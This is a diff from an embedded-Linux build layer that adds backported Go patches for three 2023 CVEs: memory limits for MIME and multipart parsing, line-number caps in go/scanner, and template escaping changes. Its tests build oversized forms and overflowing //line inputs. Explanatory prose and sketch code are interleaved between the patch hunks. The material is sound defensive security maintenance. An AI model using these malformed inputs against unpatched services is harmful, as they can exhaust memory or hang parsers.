++ t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
++ }
++ f.RemoveAll()
++ if maxMemory < failWhenMaxMemoryLessThan {
++ t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
++ }
++ return
+ }
++ t.Errorf("ReadForm(x) failed for x < 1024, expect success")
+ }
+
+ // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 9a21777df8be0..c1284fde25eb7 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ m := make(MIMEHeader, hint)
+
++ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
++ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
++ // MIMEHeaders average about 200 bytes per entry.
++ lim -= 400
++ const mapEntryOverhead = 200
++
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+ line, err := r.readLineSlice()
+@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ vv := m[key]
+ if vv == nil {
+ lim -= int64(len(key))
+- lim -= 100 // map entry overhead
++ lim -= mapEntryOverhead
+ }
+ lim -= int64(len(value))
+ if lim < 0 {
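
The constants introduced here (a 400-byte base per MIME header, 200 bytes per map entry, 100 bytes per FileHeader) are deliberately coarse estimates charged against the caller's maxMemory budget. A back-of-the-envelope sketch of the same accounting applied to an arbitrary header; the numbers mirror the patch and are not an exported API:

package main

import (
	"fmt"
	"net/textproto"
)

// estimateHeaderSize mirrors the patched mimeHeaderSize accounting:
// a 400-byte base plus 200 bytes of map-entry overhead per key,
// plus the lengths of the keys and values themselves.
func estimateHeaderSize(h textproto.MIMEHeader) int64 {
	size := int64(400)
	for k, vs := range h {
		size += int64(len(k)) + 200
		for _, v := range vs {
			size += int64(len(v))
		}
	}
	return size
}

func main() {
	h := make(textproto.MIMEHeader)
	h.Set("Content-Disposition", `form-data; name="file1"; filename="file1"`)
	h.Set("Content-Type", "application/octet-stream")
	fmt.Println("charged against maxMemory:", estimateHeaderSize(h), "bytes")
}
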
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
+From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
+
+The parsed forms of MIME headers and multipart forms can consume
+substantially more memory than the size of the input data.
+A malicious input containing a very large number of headers or
+form parts can cause excessively large memory allocations.
+
+Set limits on the size of MIME data:
+
+Reader.NextPart and Reader.NextRawPart limit the number
+of headers in a part to 10000.
+
+Reader.ReadForm limits the total number of headers in all
+FileHeaders to 10000.
+
+Both of these limits may be set with with
+GODEBUG=multipartmaxheaders=<values>.
+
+Reader.ReadForm limits the number of parts in a form to 1000.
+This limit may be set with GODEBUG=multipartmaxparts=<value>.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 19 ++++++++-
+ src/mime/multipart/formdata_test.go | 61 ++++++++++++++++++++++++++++
+ src/mime/multipart/multipart.go | 31 ++++++++++----
+ src/mime/multipart/readmimeheader.go | 2 +-
+ src/net/textproto/reader.go | 19 +++++----
+ 5 files changed, 115 insertions(+), 17 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 216cccb..0b508ae 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -13,6 +13,7 @@ import (
+ "math"
+ "net/textproto"
+ "os"
++ "strconv"
+ )
+
+ // ErrMessageTooLarge is returned by ReadForm if the message form
+@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ numDiskFiles := 0
+ multipartFiles := godebug.Get("multipartfiles")
+ combineFiles := multipartFiles != "distinct"
++ maxParts := 1000
++ multipartMaxParts := godebug.Get("multipartmaxparts")
++ if multipartMaxParts != "" {
++ if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
++ maxParts = v
++ }
++ }
++ maxHeaders := maxMIMEHeaders()
++
+ defer func() {
+ if file != nil {
+ if cerr := file.Close(); err == nil {
+@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ var copyBuf []byte
+ for {
+- p, err := r.nextPart(false, maxMemoryBytes)
++ p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
+ if err == io.EOF {
+ break
+ }
+ if err != nil {
+ return nil, err
+ }
++ if maxParts <= 0 {
++ return nil, ErrMessageTooLarge
++ }
++ maxParts--
+
+ name := p.FormName()
+ if name == "" {
+@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
++ for _, v := range p.Header {
++ maxHeaders -= int64(len(v))
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 8ed26e0..c78eeb7 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ }
+ }
+
++func TestReadFormLimits(t *testing.T) {
++ for _, test := range []struct {
++ values int
++ files int
++ extraKeysPerFile int
++ wantErr error
++ godebug string
++ }{
++ {values: 1000},
++ {values: 1001, wantErr: ErrMessageTooLarge},
++ {values: 500, files: 500},
++ {values: 501, files: 500, wantErr: ErrMessageTooLarge},
++ {files: 1000},
++ {files: 1001, wantErr: ErrMessageTooLarge},
++ {files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
++ {files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxparts=100", values: 100},
++ {godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
++ } {
++ name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
++ if test.godebug != "" {
++ name += fmt.Sprintf("/godebug=%v", test.godebug)
++ }
++ t.Run(name, func(t *testing.T) {
++ if test.godebug != "" {
++ t.Setenv("GODEBUG", test.godebug)
++ }
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ for i := 0; i < test.values; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ for i := 0; i < test.files; i++ {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition",
++ fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
++ h.Set("Content-Type", "application/octet-stream")
++ for j := 0; j < test.extraKeysPerFile; j++ {
++ h.Set(fmt.Sprintf("k%v", j), "v")
++ }
++ w, _ := fw.CreatePart(h)
++ fmt.Fprintf(w, "value %v", i)
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(1 << 10)
++ if err == nil {
++ defer form.RemoveAll()
++ }
++ if err != test.wantErr {
++ t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
++ }
++ })
++ }
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 958cef8..94464a8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -16,11 +16,13 @@ import (
+ "bufio"
+ "bytes"
+ "fmt"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "mime"
+ "mime/quotedprintable"
+ "net/textproto"
++ "strconv"
+ "strings"
+ )
+
+@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := readMIMEHeader(r, maxMIMEHeaderSize)
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err == nil {
+ bp.Header = header
+ }
+@@ -306,6 +308,19 @@ type Reader struct {
+ // including header keys, values, and map overhead.
+ const maxMIMEHeaderSize = 10 << 20
+
++func maxMIMEHeaders() int64 {
++ // multipartMaxHeaders is the maximum number of header entries NextPart will return,
++ // as well as the maximum combined total of header entries Reader.ReadForm will return
++ // in FileHeaders.
++ multipartMaxHeaders := godebug.Get("multipartmaxheaders")
++ if multipartMaxHeaders != "" {
++ if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
++ return v
++ }
++ }
++ return 10000
++}
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false, maxMIMEHeaderSize)
++ return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true, maxMIMEHeaderSize)
++ return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+index 6836928..25aa6e2 100644
+--- a/src/mime/multipart/readmimeheader.go
++++ b/src/mime/multipart/readmimeheader.go
+@@ -11,4 +11,4 @@ import (
+ // readMIMEHeader is defined in package net/textproto.
+ //
+ //go:linkname readMIMEHeader net/textproto.readMIMEHeader
+-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
++func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 1c79f0a..ad2d777 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+- return readMIMEHeader(r, math.MaxInt64)
++ return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
+ }
+
+ // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
+ // It is called by the mime/multipart package.
+-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
++func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
+ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
+ // MIMEHeaders average about 200 bytes per entry.
+- lim -= 400
++ maxMemory -= 400
+ const mapEntryOverhead = 200
+
+ // The first line cannot start with a leading space.
+@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ continue
+ }
+
++ maxHeaders--
++ if maxHeaders < 0 {
++ return nil, errors.New("message too large")
++ }
++
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+ //
+ // value is computed as
+@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ vv := m[key]
+ if vv == nil {
+- lim -= int64(len(key))
+- lim -= mapEntryOverhead
++ maxMemory -= int64(len(key))
++ maxMemory -= mapEntryOverhead
+ }
+- lim -= int64(len(value))
+- if lim < 0 {
++ maxMemory -= int64(len(value))
++ if maxMemory < 0 {
+ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+ // to allow mime/multipart to detect it.
+ return m, errors.New("message too large")
+--
+2.25.1
+
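As a rough illustration of the part limit added above (not part of the patch itself, and only meaningful with a Go toolchain carrying this backport), a form with more parts than the default 1000 makes ReadForm fail with ErrMessageTooLarge; the 1001-part count and 32 MiB memory cap below are arbitrary example values, and GODEBUG=multipartmaxparts=<value> can raise or lower the ceiling:

    // Illustrative sketch only; assumes the backported limits are present.
    package main

    import (
        "bytes"
        "fmt"
        "mime/multipart"
    )

    func main() {
        var buf bytes.Buffer
        w := multipart.NewWriter(&buf)
        for i := 0; i < 1001; i++ { // one more than the default 1000-part limit
            fw, _ := w.CreateFormField(fmt.Sprintf("field%d", i))
            fmt.Fprintf(fw, "value %d", i)
        }
        w.Close()

        r := multipart.NewReader(bytes.NewReader(buf.Bytes()), w.Boundary())
        form, err := r.ReadForm(32 << 20)
        if err != nil {
            fmt.Println("ReadForm error:", err) // with the backport: multipart: message too large
            return
        }
        defer form.RemoveAll()
        fmt.Println("parsed", len(form.Value), "values") // without the limit, all 1001 parse
    }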
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
+From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.20] go/scanner: reject large line and
+ column numbers in //line directives
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
+CVE: CVE-2023-24537
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/parser_test.go | 16 ++++++++++++++++
+ src/go/scanner/scanner.go | 5 ++++-
+ 2 files changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 37a6a2b..714557c 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
+ }
+ }
+ }
++
++// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
++func TestIssue59180(t *testing.T) {
++ testcases := []string{
++ "package p\n//line :9223372036854775806\n\n//",
++ "package p\n//line :1:9223372036854775806\n\n//",
++ "package p\n//line file:9223372036854775806\n\n//",
++ }
++
++ for _, src := range testcases {
++ _, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
++ if err == nil {
++ t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
++ }
++ }
++}
+diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
+index 00fe2dc..3159d25 100644
+--- a/src/go/scanner/scanner.go
++++ b/src/go/scanner/scanner.go
+@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
+ return
+ }
+
++ // Put a cap on the maximum size of line and column numbers.
++ // 30 bits allows for some additional space before wrapping an int32.
++ const maxLineCol = 1<<30 - 1
+ var line, col int
+ i2, n2, ok2 := trailingDigits(text[:i-1])
+ if ok2 {
+ //line filename:line:col
+ i, i2 = i2, i
+ line, col = n2, n
+- if col == 0 {
++ if col == 0 || col > maxLineCol {
+ s.error(offs+i2, "invalid column number: "+string(text[i2:]))
+ return
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
+From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
+From: Brad Fitzpatrick <bradfitz@golang.org>
+Date: Mon, 2 Aug 2021 14:55:51 -0700
+Subject: [PATCH 1/6] net/netip: add new IP address package
+
+Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
+Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
+Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
+Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
+Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
+Co-authored-by: Elias Naur <mail@eliasnaur.com>
+Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
+Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
+Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
+Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
+Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
+Co-authored-by: Matt Layher <mdlayher@gmail.com>
+Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
+Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
+Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
+Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
+
+Fixes #46518
+
+Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
+Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
+Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+Trust: Brad Fitzpatrick <bradfitz@golang.org>
+
+Dependency Patch #1
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/internal/godebug/godebug.go | 34 ++++++++++++++++++++++++++++++++++
+ src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+)
+ create mode 100644 src/internal/godebug/godebug.go
+ create mode 100644 src/internal/godebug/godebug_test.go
+
+diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
+new file mode 100644
+index 0000000..ac434e5
+--- /dev/null
++++ b/src/internal/godebug/godebug.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++// Package godebug parses the GODEBUG environment variable.
++package godebug
++
++import "os"
++
++// Get returns the value for the provided GODEBUG key.
++func Get(key string) string {
++ return get(os.Getenv("GODEBUG"), key)
++}
++
++// get returns the value part of key=value in s (a GODEBUG value).
++func get(s, key string) string {
++ for i := 0; i < len(s)-len(key)-1; i++ {
++ if i > 0 && s[i-1] != ',' {
++ continue
++ }
++ afterKey := s[i+len(key):]
++ if afterKey[0] != '=' || s[i:i+len(key)] != key {
++ continue
++ }
++ val := afterKey[1:]
++ for i, b := range val {
++ if b == ',' {
++ return val[:i]
++ }
++ }
++ return val
++ }
++ return ""
++}
+diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
+new file mode 100644
+index 0000000..41b9117
+--- /dev/null
++++ b/src/internal/godebug/godebug_test.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package godebug
++
++import "testing"
++
++func TestGet(t *testing.T) {
++ tests := []struct {
++ godebug string
++ key string
++ want string
++ }{
++ {"", "", ""},
++ {"", "foo", ""},
++ {"foo=bar", "foo", "bar"},
++ {"foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar", "foo", "bar"},
++ {",,,foo=bar,,,", "foo", "bar"},
++ {"foodecoy=wrong,foo=bar", "foo", "bar"},
++ {"foo=", "foo", ""},
++ {"foo", "foo", ""},
++ {",foo", "foo", ""},
++ {"foo=bar,baz", "loooooooong", ""},
++ }
++ for _, tt := range tests {
++ got := get(tt.godebug, tt.key)
++ if got != tt.want {
++ t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
++ }
++ }
++}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
new file mode 100644
index 0000000000..f200c41e16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
+From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
+From: empijei <robclap8@gmail.com>
+Date: Fri, 27 Mar 2020 19:27:55 +0100
+Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
+ for JSON compatibility
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The existing implementation is not compatible with JSON
+escape as it uses hex escaping.
+Unicode escape, instead, is valid for both JSON and JS.
+This fix avoids creating a separate escaping context for
+scripts of type "application/ld+json" and it is more
+future-proof in case more JSON+JS contexts get added
+to the platform (e.g. import maps).
+
+Fixes #33671
+Fixes #37634
+
+Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
+Reviewed-by: Carl Johnson <me@carlmjohnson.net>
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #2
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/content_test.go | 70 +++++++++++++++++++-------------------
+ src/html/template/escape_test.go | 6 ++--
+ src/html/template/example_test.go | 6 ++--
+ src/html/template/js.go | 70 +++++++++++++++++++++++---------------
+ src/html/template/js_test.go | 68 ++++++++++++++++++------------------
+ src/html/template/template_test.go | 39 +++++++++++++++++++++
+ src/text/template/exec_test.go | 6 ++--
+ src/text/template/funcs.go | 8 ++---
+ 8 files changed, 163 insertions(+), 110 deletions(-)
+
+diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
+index 72d56f5..bd86527 100644
+--- a/src/html/template/content_test.go
++++ b/src/html/template/content_test.go
+@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
+ HTML(`Hello, <b>World</b> &amp;tc!`),
+ HTMLAttr(` dir="ltr"`),
+ JS(`c && alert("Hello, World!");`),
+- JSStr(`Hello, World & O'Reilly\x21`),
++ JSStr(`Hello, World & O'Reilly\u0021`),
+ URL(`greeting=H%69,&addressee=(World)`),
+ Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
+ URL(`,foo/,`),
+@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello,&#32;World&#32;&amp;tc!`,
+ `&#32;dir&#61;&#34;ltr&#34;`,
+ `c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
+- `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
++ `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
+ `,foo/,`,
+@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, World &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
